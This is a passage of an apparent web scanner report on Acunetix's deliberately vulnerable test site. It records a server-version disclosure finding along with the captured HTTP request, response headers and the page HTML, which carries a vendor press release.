pdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 30545
Response Body - size: 30,545 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgI